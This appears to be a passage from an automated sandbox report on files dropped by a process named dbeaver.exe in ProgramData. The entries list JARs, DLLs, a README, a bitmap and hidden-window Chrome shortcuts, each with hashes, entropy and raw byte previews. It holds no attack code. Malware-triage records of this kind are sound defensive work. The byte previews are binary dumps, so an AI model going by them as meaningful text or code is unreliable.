      Preview:PK..........lR................META-INF/....PK..........lR...u............META-INF/MANIFEST.MF.P]K.0.}..?.Q...@d}...U.t.ow.u.K...J._o.L....q.='..z.@r.>T...@.....d..QD,..T.8.z..BN6.p.R5...g...A1u.q.(..9...A.5}.."..xy.....l.1|..I.^.....L.DM...5."..U.m.w..U.5...... ."gyk..34......2.-..{j..Kg*}.6.b...v.^....N@....V..~..9.Nq..U9..PK..........lR................org/PK..........lR................org/tukaani/PK..........lR................org/tukaani/xz/PK..........lR................org/tukaani/xz/check/PK..........lR................org/tukaani/xz/common/PK..........lR................org/tukaani/xz/delta/PK..........lR................org/tukaani/xz/index/PK..........lR................org/tukaani/xz/lz/PK..........lR................org/tukaani/xz/lzma/PK..........lR................org/tukaani/xz/rangecoder/PK..........lR................org/tukaani/xz/simple/PK..........lR..=............org/tukaani/xz/ARMOptions.class...N.@...!.n..@..+.G'.u.=.RB8(..T...3a..`G...>S/.T)R...}.....!.../....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):64579
      Entropy (8bit):7.832445082251774
      Encrypted:false
      SSDEEP:
      MD5:45630E54B0F0AC2B3C80462515AD8FDA
      SHA1:7CF2726FDCFBC8610F9A71FB3ED639871F315340
      SHA-256:0818930DC8D7DEBB403204611691DA58E49D42C50B6FFCFDCE02DADB7C3C2B6C
      SHA-512:069E6DDCE79617E37D61758120C7E68348EE62F255781948937F7BEC3058E46244026D7F6A11E90FBC15CD4288C4BB1ACEE4F242AF521C721A9E68A05E64D526
      Malicious:false
      Reputation:unknown
      Preview:PK..........#W................META-INF/MANIFEST.MF......]o.0...#.?x...T....T.n*+..VM....W...C.....v...~..G<.w.[z.&.*.I.E.wn.[H..9&g.'. #.....,.@....|b-v.{.B...{:...9......#.-.3...../9._m$*.5....Z.7......1e..Z$..R.M.0.8iSV.......L/t...k.Km..|........TZH.....Bd%...Z....Re...s.m....E..]>ie,......W...L=........m....i...Hi..z.*H?(..G{.W...#9.!.:.!.FB.N.......t......H:..72m......w....x...Kg....r.{..a...a.......N.!G...N@.w....:..B...\.[!..T.\0x......`......_.r0+\.7j...Q..2ac..>.>.....]Z....Eq.$.D......r3..`l.J.$.z.=.WW...S..$...z....O/....5x.... Ki.u..jG.v.NZ.V..~.s...|........n;f........PK...[ .>...C...PK..........#W................META-INF/PK..........#W................META-INF/versions/PK..........#W................META-INF/versions/9/PK..........#W................org/PK..........#W................org/slf4j/PK..........#W................org/slf4j/event/PK..........#W................org/slf4j/helpers/PK..........#W................org/slf4j/spi/PK.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1811
      Entropy (8bit):4.769691496807661
      Encrypted:false
      SSDEEP:
      MD5:60EC5AB957AD168C03C2B4067CF0F510
      SHA1:6F68747501EC2D00BB53D82D7EFAA3A43025032B
      SHA-256:33A044D1EE626CF7DA4C7E259F024292C9E9413F3F46839A50798E9E9E74FB9B
      SHA-512:F74067C0970153888D7A0BE4E90851F4B7F7615B73051B545F73386C730CE6056FCC8F5838EDCD56A5E0A21C64C5EBA79228DC7FAA80E96EE2738C57F251D656
      Malicious:false
      Reputation:unknown
      Preview:DBeaver..24.0.0..README..Thank you for downloading DBeaver!..Installing DBeaver.========================. Use automatic installer distribution (Windows and Linux versions). or just unpack archive and start "dbeaver" executable.. . Note: do not extract archive in the same folder where older version. of DBeaver is installed.. Remove previous version or extract archive in another folder...Command line parameters.========================.. -f <sql-file1 [sql-file2..]>. Open specified SQL file(s) in SQL editor.. This command can be used to associate SQL files with DBeaver in shell... -nosplash. Do not show splash screen.. -data <path>. Store all projects/configuration in folder <path>. By default DBeaver..stores all its data in user's home "DBeaverData" folder...<path> can be an absolute or relative directory name...If you want to use DBeaver as redistributable program start it..with arguments like "dbeaver -data workspace"... -nl locale. Use specified locale instea
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):103816
      Entropy (8bit):6.125069878151044
      Encrypted:false
      SSDEEP:
      MD5:41895FDED06DF08460490DC128F2C91D
      SHA1:7A4DDB22546665312CD58B9638BCC2AF2AA52931
      SHA-256:829632C63FB95CDA2D06E05A90AB8C52F63A0CA5A7378E48212F16C672296EAB
      SHA-512:3375201EEF2CB34BCB4ADECC3C1639E5C2477159F2C621C615FA9B60D2E3D804CA7C2B00FCCABDF0565C1849F7E0BF849E5C17EF5C3C6264F6D3D141E73FB9DF
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............dV..dV..dV..aW{.dV..aW..dV..`W.dV..gW..dVF.eW..dV..gW..dV..`W.dV..eW..dV..eV..dV..`W..dV..dW..dV...V..dV..fW..dVRich..dV........................PE..d.....Le.........." ................................................................l.....`..........................................V.......V..<...............8....l...)......,....E...............................F..................(............................text............................... ..`.rdata..`...........................@..@.data........`.......F..............@....pdata..8............P..............@..@_RDATA...............^..............@..@.rsrc................`..............@..@.reloc..,............d..............@..B................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):153992
      Entropy (8bit):6.237801823248498
      Encrypted:false
      SSDEEP:
      MD5:50A6AC9CC83B74B78A3884FBED383DE8
      SHA1:DA21B084F718F346C91D7DC4FC4B4FCB4F4C5E71
      SHA-256:370CE0D900B2E9C439127D79676B7C416E741FD67CAD5B12902FA9A582A8C3E2
      SHA-512:B1FDEC77D3D629529374AD2396FFE39291A1E63850218A83CBD08A3E6E54139214CED8DB2270E97A01D0430C790CC11F79C33714EE4C52B538D62FFB99099DCB
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.|.}j..}j..}j..i....j../..._j../...wj../...uj..i...{j..i...sj..i...zj..}j...k..(...yj..(...|j..(..|j..(...|j..Rich}j..................PE..d.....Le.........." .........4...... n...............................................l....`..............................................7......P....`.......0.......0...)...p......P...............................p................ ...............................text............................... ..`.rdata..z.... ......................@..@.data...............................@....pdata.......0......................@..@_RDATA.......P......."..............@..@.rsrc........`.......$..............@..@.reloc.......p.......(..............@..B................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):107400
      Entropy (8bit):6.1422362414291785
      Encrypted:false
      SSDEEP:
      MD5:96738AB7D4CBBBE9461D0C01304301F8
      SHA1:E715B8B84FE44F20911E289F9385E2253472A937
      SHA-256:F8FF5AA2B06578CCA60AE42741EA5C2D07D0A282197F2FF21E72F162B292BF53
      SHA-512:AE1D157CE17EB0161B70E26406B88E87BC11CF094E25B0F181122C30F9EF256EA21FBF52EA5BAB2EA5A802F78EFA2CA01AC083CAF9436D4FC590B4557A637D51
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........hz..)..)..)...(d..)...(...)...(..)...(..)...(..)...(..)...(..)..)...)...(..)...(...)...)...)...(...)Rich..)........................PE..d.....Le.........." .................!....................................................`..........................................W.......Z..P...............\....z...)......$....G...............................G..................x............................text............................... ..`.rdata..............................@..@.data........p.......T..............@....pdata..\............^..............@..@_RDATA...............l..............@..@.rsrc................n..............@..@.reloc..$............r..............@..B........................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):771464
      Entropy (8bit):5.96529282552355
      Encrypted:false
      SSDEEP:
      MD5:058A416DD9556947756F89E59236C6EE
      SHA1:193893DD55F181E455CE8BDDF6EAF0F474B3738E
      SHA-256:1D3AA66F3E51943EB7E416145A0951B2AC37070F117183B04829F22D972D8D1C
      SHA-512:A05FDF4C3CDAE2F2AF09FD74A6531694146D932FDA0B27E2CC39405D1A414756B9EB2E7321DB6ADDFB2352589FF78A8C3D1BDF1528D369591CE9D5DCCC207FC5
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.Y...7F..7F..7F..2G..7F[.2G..7F[.3G..7F[.4G..7F..4G..7F..3G..7F..6G .7F..6F!.7F\.3G..7F\.2G..7F\.7G..7F\..F..7F\.5G..7FRich..7F........................PE..d.....Le.........." .....&...........2.......................................`......3.....`..........................................+......<)...............P..........)...0...!...................................................@..p............................text....$.......&.................. ..`.rdata...!...@..."...*..............@..@.data...P....p...v...L..............@....pdata......P......................@..@_RDATA...............f..............@..@.rsrc................h..............@..@.reloc...!...0..."...z..............@..B................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):5632
      Entropy (8bit):3.81812520226775
      Encrypted:false
      SSDEEP:
      MD5:68B287F4067BA013E34A1339AFDB1EA8
      SHA1:45AD585B3CC8E5A6AF7B68F5D8269C97992130B3
      SHA-256:18E8B40BA22C7A1687BD16E8D585380BC2773FFF5002D7D67E9485FCC0C51026
      SHA-512:06C38BBB07FB55256F3CDC24E77B3C8F3214F25BFD140B521A39D167113BF307A7E8D24E445D510BC5E4E41D33C9173BB14E3F2A38BC29A0E3D08C1F0DCA4BDB
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....Oa...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):7680
      Entropy (8bit):4.645138827340001
      Encrypted:false
      SSDEEP:
      MD5:D070F3275DF715BF3708BEFF2C6C307D
      SHA1:93D3725801E07303E9727C4369E19FD139E69023
      SHA-256:42DD4DDA3249A94E32E20F76EAFFAE784A5475ED00C60EF0197C8A2C1CCD2FB7
      SHA-512:FCAF625DAC4684DAD33D12E3A942B38489ECC90649EEE885D823A932E70DB63C1EDB8614B9FA8904D1710E9B820E82C5A37AEB8403CF21CF1E3692F76438664D
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(...(...(..<'...(.......(..8....(.......(..Rich.(..........................PE..L.....Oa...........!.........8............... ............................................@..........................$..e.... ..x....`..(....................p..t.................................................... ...............................text............................... ..`.rdata..U.... ......................@..@.data...t*...0......................@....rsrc...(....`......................@..@.reloc..B....p......................@..B................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):12288
      Entropy (8bit):5.814115788739565
      Encrypted:false
      SSDEEP:
      MD5:CFF85C549D536F651D4FB8387F1976F2
      SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
      SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
      SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):14848
      Entropy (8bit):5.715583967305762
      Encrypted:false
      SSDEEP:
      MD5:ADB29E6B186DAA765DC750128649B63D
      SHA1:160CBDC4CB0AC2C142D361DF138C537AA7E708C9
      SHA-256:2F7F8FC05DC4FD0D5CDA501B47E4433357E887BBFED7292C028D99C73B52DC08
      SHA-512:B28ADCCCF0C33660FECD6F95F28F11F793DC9988582187617B4C113FB4E6FDAD4CF7694CD8C0300A477E63536456894D119741A940DDA09B7DF3FF0087A7EADA
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#.?NB.lNB.lNB.li..lEB.lNB.l.B.li..lMB.li..lOB.li..lOB.li..lOB.lRichNB.l................PE..L...@.dU...........!.....,...........).......@...............................p.......................................;..<....3..x....P.......................`..........................................................\............................text....+.......,.................. ..`.data...d....@.......0..............@....rsrc........P.......2..............@..@.reloc.......`.......4..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):4096
      Entropy (8bit):3.3422620069068625
      Encrypted:false
      SSDEEP:
      MD5:2F69AFA9D17A5245EC9B5BB03D56F63C
      SHA1:E0A133222136B3D4783E965513A690C23826AEC9
      SHA-256:E54989D2B83E7282D0BEC56B098635146AAB5D5A283F1F89486816851EF885A0
      SHA-512:BFD4AF50E41EBC56E30355C722C2A55540A5BBDDB68F1522EF7AABFE4F5F2A20E87FA9677EE3CDB3C0BF5BD3988B89D1224D32C9F23342A16E46C542D8DC0926
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L...!.Oa...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PC bitmap, Windows 3.x format, 164 x 314 x 24, image size 154490, resolution 2834 x 2834 px/m, cbSize 154544, bits offset 54
      Category:dropped
      Size (bytes):154544
      Entropy (8bit):4.554218110233354
      Encrypted:false
      SSDEEP:
      MD5:4336CB6AD378840F8FA1D180B152B2A8
      SHA1:01CB79EC8164A2B8342DEC6EC19CB032DC7230D5
      SHA-256:84944E08BCCEE7B5D6C910F8FB5665342B3A238409ACC76FF564E31F0204D0C6
      SHA-512:92F2CC95284134D801B3C88407BEE7D25090A07DE3CFF218F4F3EABFC14DF270A97D15F8C89158B6E35EB054B89817CD0F6B6042F115D56CD7EB4376CE9BC28C
      Malicious:false
      Reputation:unknown
      Preview:BM.[......6...(.......:...........z[..................#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#)7#
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):9728
      Entropy (8bit):5.158136237602734
      Encrypted:false
      SSDEEP:
      MD5:6C3F8C94D0727894D706940A8A980543
      SHA1:0D1BCAD901BE377F38D579AAFC0C41C0EF8DCEFD
      SHA-256:56B96ADD1978B1ABBA286F7F8982B0EFBE007D4A48B3DED6A4D408E01D753FE2
      SHA-512:2094F0E4BB7C806A5FF27F83A1D572A5512D979EEFDA3345BAFF27D2C89E828F68466D08C3CA250DA11B01FC0407A21743037C25E94FBE688566DD7DEAEBD355
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L.....Oa...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 8 18:07:31 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2677
      Entropy (8bit):3.9897457378558543
      Encrypted:false
      SSDEEP:
      MD5:A55C23A64E6A3C2FB9CDC68B63A36D5C
      SHA1:24E05611135A5427CE8B3FE9FDC97D0B14EBDADE
      SHA-256:413A394B14ED7EE1EC6D7051D761DD942ED62ABCC8E8C1967788B9C2963F1CA7
      SHA-512:7862F67C37ACB63E07D625D0E5263025572B22131F22091208E3C11A4BC261AC194550E978D41DAB8CDD0B1727154634C06A93DEE39B150DD3DE2C0E1E0BAAF0
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,........q......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IhX.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VhX.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VhX.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VhX............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VhX............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............i.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 8 18:07:31 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2679
      Entropy (8bit):4.005729232096403
      Encrypted:false
      SSDEEP:
      MD5:30B3710D22E0D743A1F5377AD69664EC
      SHA1:457B038AFFF73D103DE3C81F89B112017AB820E4
      SHA-256:3AC8149B8B7E22074787DEA90E9A83770C186B30FE70139CA68D2BC71351B358
      SHA-512:E2DF356BDA722437BEB931E3BA695D4824C152756B699A7AAA73A05E92876DA4CFC70E196C20D5299971DBC8274C321BF3ABCED6E631C36AF4041F02FBE0BBBB
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,........q......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IhX.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VhX.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VhX.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VhX............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VhX............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............i.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2693
      Entropy (8bit):4.011721889440659
      Encrypted:false
      SSDEEP:
      MD5:B84B4C28A7CC480640B4AC0CD8F34A00
      SHA1:147CFB76B65EE84A11040F3A5C8C7820448916E8
      SHA-256:27AF59DBB8F55E3A909A28E6257C50D1E5A1D7E537B6BD28E0218AD6576746D2
      SHA-512:523B17F642256BCDB762BD46E4D77FEC721EC017F2CD0014F4C4BCFF23E6CBEA993160FD3ADDA82EA1D508F6599342E45A4CCF5C288ADDEED97C0D87625C3540
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IhX.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VhX.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VhX.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VhX............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............i.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 8 18:07:31 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2681
      Entropy (8bit):4.002069159023645
      Encrypted:false
      SSDEEP:
      MD5:E7293200A0211D5C4673776096928890
      SHA1:6B564526BAEA585939F3E0B5E7718291BA2FBB1F
      SHA-256:2722402E8598F7F4BDC6831B5FE7F80819B8736EBE86D8FCF962827043BCACDE
      SHA-512:E2B908585672FE16A00E0A942C9A354532BD7890ECA2663F0AC939836356E4828DD2018A358953F32C1E2D3BDA54394F60806F58656028C2B1BC67BD5D218C78
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,.....{..q......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IhX.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VhX.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VhX.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VhX............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VhX............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............i.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 8 18:07:31 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2681
      Entropy (8bit):3.991120741231453
      Encrypted:false
      SSDEEP:
      MD5:298CFE0E728D0CB30D95DF09558DD945
      SHA1:E48EF7313CE3CEB10BC3183BDB24F94167637366
      SHA-256:C835D607BBDF762E2C1870CA1822DFF214F28A859D58F637FCE6B2685C4398AB
      SHA-512:B22D48D54854BBF86EC78D72402678EAD1F42E46D7EE87090037D4DBB3E1067554C32E6DAF1481CA0C2FA1BDC90DFE2247AB6EB9D58661D5D5E2C7B621758E60
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,....l^..q......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IhX.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VhX.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VhX.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VhX............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VhX............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............i.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 8 18:07:31 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2683
      Entropy (8bit):4.005175695085482
      Encrypted:false
      SSDEEP:
      MD5:8FC634C59D5F91731DB7F711C4B368F7
      SHA1:DF5759495B20111150FBF1E431611B96DCA6F625
